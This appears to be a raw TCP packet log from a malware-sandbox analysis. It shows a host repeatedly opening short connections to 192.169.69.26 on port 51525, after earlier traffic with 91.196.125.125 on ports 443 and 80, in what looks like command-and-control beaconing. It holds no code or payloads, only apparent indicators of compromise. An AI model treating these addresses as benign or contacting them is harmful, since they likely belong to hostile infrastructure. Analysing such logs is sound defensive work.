                                      Nov 13, 2024 08:18:56.141916037 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.141984940 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.171228886 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.171340942 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.265331984 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.265388012 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.292470932 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.292538881 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.387743950 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.387804031 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.415627003 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.415693045 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.469228983 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.469283104 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.512208939 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.512273073 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.539532900 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.539612055 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.592608929 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.592665911 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.667123079 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.667213917 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.715998888 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.716072083 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.757735968 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.757810116 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.785923958 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.785984993 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.839333057 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.839406013 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.882122993 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.882180929 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.909636021 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.909708023 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.962663889 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.962732077 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.005472898 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.005644083 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.033010960 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.033082008 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.086112022 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.086174011 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.128801107 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.128870964 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.156230927 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.156311989 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.157435894 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.157495975 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.251497030 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.251609087 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.280462980 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.280534983 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.280914068 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.280972004 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.333096027 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.333234072 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.377141953 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.377273083 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.404226065 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.404306889 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.456294060 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.456357002 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.457084894 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.457134962 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.527352095 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.527435064 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.527689934 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.527748108 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.579773903 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.579864025 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.621635914 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.621715069 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.650749922 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.650836945 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.651526928 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.651578903 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.703351021 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.703444004 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.748083115 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.748171091 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.774105072 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.774188995 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.774733067 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.774796963 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.826714993 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.826792002 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.869306087 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.869368076 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.871699095 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.871757030 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.897975922 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.898062944 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.949940920 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.950165033 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.950530052 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.950601101 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:57.994698048 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:57.994785070 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.021156073 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:58.021229982 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.021785975 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:58.021838903 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:58.021842957 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.021879911 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.022094965 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.022109985 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:58.022119999 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:58.022154093 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:59.167421103 CET804973691.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:59.167483091 CET4973680192.168.2.491.196.125.125
                                      Nov 13, 2024 08:19:02.419867992 CET4975551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:02.424712896 CET5152549755192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:02.424778938 CET4975551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:02.428972006 CET4975551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:02.433768988 CET5152549755192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:03.195411921 CET5152549755192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:03.195467949 CET4975551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:03.196433067 CET4975551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:03.201226950 CET5152549755192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:03.301989079 CET4976051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:03.306837082 CET5152549760192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:03.306911945 CET4976051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:03.345501900 CET4976051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:03.350277901 CET5152549760192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.049333096 CET5152549760192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.049443007 CET4976051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.049685955 CET4976051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.054409981 CET5152549760192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.158756018 CET4976551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.163542986 CET5152549765192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.163619041 CET4976551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.167824030 CET4976551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.172593117 CET5152549765192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.926244020 CET5152549765192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:04.926316023 CET4976551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.927100897 CET4976551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:04.931904078 CET5152549765192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:05.990813017 CET4977651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:05.995595932 CET5152549776192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:05.995661020 CET4977651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.005196095 CET4977651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.010023117 CET5152549776192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:06.827687025 CET5152549776192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:06.827743053 CET4977651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.828500032 CET4977651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.829818964 CET4978251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.833256960 CET5152549776192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:06.834728003 CET5152549782192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:06.834788084 CET4978251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.835426092 CET4978251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:06.840291023 CET5152549782192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:07.617086887 CET5152549782192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:07.617146015 CET4978251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:07.617407084 CET4978251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:07.618957996 CET4978451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:07.622159004 CET5152549782192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:07.624305964 CET5152549784192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:07.624397039 CET4978451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:07.628257990 CET4978451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:07.633049011 CET5152549784192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:08.401027918 CET5152549784192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:08.401107073 CET4978451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:08.401911974 CET4978451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:08.407064915 CET5152549784192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:09.500380993 CET4979951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:09.505264997 CET5152549799192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:09.505356073 CET4979951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:09.512254953 CET4979951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:09.517322063 CET5152549799192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:10.382827997 CET5152549799192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:10.382921934 CET4979951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:10.383708000 CET4979951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:10.385118008 CET4980551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:10.388564110 CET5152549799192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:10.390006065 CET5152549805192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:10.390078068 CET4980551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:10.391282082 CET4980551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:10.396090031 CET5152549805192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.154139042 CET5152549805192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.154472113 CET4980551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.154928923 CET4980551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.157624960 CET4981051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.159663916 CET5152549805192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.162437916 CET5152549810192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.163563013 CET4981051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.167706013 CET4981051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.172508955 CET5152549810192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.936098099 CET5152549810192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:11.936170101 CET4981051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.936867952 CET4981051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:11.941840887 CET5152549810192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:12.954790115 CET4982251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:12.966897964 CET5152549822192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:12.966965914 CET4982251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:12.974560976 CET4982251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:12.979392052 CET5152549822192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:13.772062063 CET5152549822192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:13.772123098 CET4982251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:13.772789001 CET4982251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:13.774729013 CET4982551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:13.777611971 CET5152549822192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:13.779771090 CET5152549825192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:13.779853106 CET4982551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:13.781011105 CET4982551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:13.785810947 CET5152549825192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:14.567677021 CET5152549825192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:14.567754984 CET4982551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:14.568106890 CET4982551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:14.569592953 CET4983051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:14.572916985 CET5152549825192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:14.574398041 CET5152549830192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:14.574460983 CET4983051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:14.580108881 CET4983051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:14.584989071 CET5152549830192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:15.348989010 CET5152549830192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:15.349073887 CET4983051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:15.349971056 CET4983051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:15.357858896 CET5152549830192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:16.359754086 CET4984251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:16.364691973 CET5152549842192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:16.364764929 CET4984251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:16.369019032 CET4984251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:16.373867989 CET5152549842192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:17.218873024 CET5152549842192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:17.218929052 CET4984251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:17.219755888 CET4984251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:17.221173048 CET4984751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:17.224541903 CET5152549842192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:17.226067066 CET5152549847192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:17.226128101 CET4984751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:17.226763010 CET4984751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:17.231617928 CET5152549847192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.031869888 CET5152549847192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.031925917 CET4984751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.032216072 CET4984751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.034156084 CET4985351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.039808035 CET5152549847192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.040416002 CET5152549853192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.040477037 CET4985351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.046423912 CET4985351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.052608013 CET5152549853192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.829129934 CET5152549853192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:18.829600096 CET4985351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.830272913 CET4985351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:18.835083961 CET5152549853192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:19.843691111 CET4986551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:19.848468065 CET5152549865192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:19.848546028 CET4986551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:19.852495909 CET4986551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:19.857399940 CET5152549865192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:20.612679005 CET5152549865192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:20.612797022 CET4986551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:20.613429070 CET4986551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:20.614768028 CET4987051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:20.618277073 CET5152549865192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:20.619534016 CET5152549870192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:20.619610071 CET4987051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:20.620210886 CET4987051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:20.625137091 CET5152549870192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:21.461872101 CET5152549870192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:21.462013006 CET4987051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:21.462418079 CET4987051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:21.463927031 CET4987651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:21.467178106 CET5152549870192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:21.468729019 CET5152549876192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:21.468787909 CET4987651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:21.472850084 CET4987651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:21.477632999 CET5152549876192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:22.252996922 CET5152549876192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:22.253067970 CET4987651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:22.253698111 CET4987651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:22.258491993 CET5152549876192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:23.266222954 CET4988751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:23.271171093 CET5152549887192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:23.271245956 CET4988751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:23.276070118 CET4988751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:23.281322002 CET5152549887192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.028208971 CET5152549887192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.028265953 CET4988751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.028934956 CET4988751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.030288935 CET4989351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.033680916 CET5152549887192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.035125017 CET5152549893192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.035181999 CET4989351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.036166906 CET4989351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.041047096 CET5152549893192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.794394016 CET5152549893192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.795697927 CET4989351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.795823097 CET4989351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.797218084 CET4989951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.801063061 CET5152549893192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.802819967 CET5152549899192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:24.803220987 CET4989951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.807600021 CET4989951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:24.812587023 CET5152549899192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:25.653285980 CET5152549899192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:25.653490067 CET4989951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:25.654021978 CET4989951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:25.658761978 CET5152549899192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:26.657538891 CET4991051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:26.662336111 CET5152549910192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:26.662417889 CET4991051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:26.666672945 CET4991051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:26.671468973 CET5152549910192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:27.445420027 CET5152549910192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:27.445483923 CET4991051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:27.446157932 CET4991051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:27.447666883 CET4991651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:27.452018976 CET5152549910192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:27.453206062 CET5152549916192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:27.453272104 CET4991651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:27.454453945 CET4991651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:27.459191084 CET5152549916192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:28.316838980 CET5152549916192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:28.316909075 CET4991651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:28.317120075 CET4991651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:28.318517923 CET4992251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:28.322021961 CET5152549916192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:28.323368073 CET5152549922192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:28.325628996 CET4992251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:28.329766035 CET4992251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:28.334579945 CET5152549922192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:29.114708900 CET5152549922192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:29.114784956 CET4992251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:29.116113901 CET4992251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:29.120901108 CET5152549922192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.124921083 CET4993351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.130000114 CET5152549933192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.130064011 CET4993351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.134624958 CET4993351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.139928102 CET5152549933192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.895188093 CET5152549933192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.896084070 CET4993351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.896802902 CET4993351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.898255110 CET4993851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.901592016 CET5152549933192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.903047085 CET5152549938192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:30.903110027 CET4993851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.903882027 CET4993851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:30.909110069 CET5152549938192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:31.676027060 CET5152549938192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:31.676110983 CET4993851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:31.676326990 CET4993851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:31.681118011 CET5152549938192.169.69.26192.168.2.4
